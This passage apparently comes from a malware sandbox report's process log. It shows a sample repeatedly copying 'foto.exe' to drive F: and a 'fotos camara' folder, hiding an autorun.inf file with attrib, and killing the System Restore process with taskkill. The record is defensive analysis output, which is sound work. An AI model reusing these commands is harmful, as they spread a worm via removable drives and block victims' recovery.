    3⤵
    PID:2392
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2196
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2376
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2724
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2892
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2808
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2240
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2620
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2640
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2848
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2788
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:764
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:1984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2508
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:472
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:296
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1560
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2324
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1736
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:876
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:540
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2844
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3036
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2092
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:908
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1048
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3040
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1740
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1548
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:988
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2584
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:588
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1060
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2016
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:884
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:712
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:640
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2420
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1196
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:316
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2392
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2812
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2240
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2968
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1860
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:2684
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2444
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3000
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2956
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1356
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2852
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:472
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2060
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Drops autorun.inf file
    PID:2148
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:444
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:488
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    - Enumerates system info in registry
    PID:1648
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2408
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1476
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1524
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3032
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:408
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:960
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:612
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2416
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1056
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1884
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1000
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:772
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2076
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:620
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:912
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2212
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1932
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2532
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:816
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1792
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2824
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:3028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\xcopy.exe
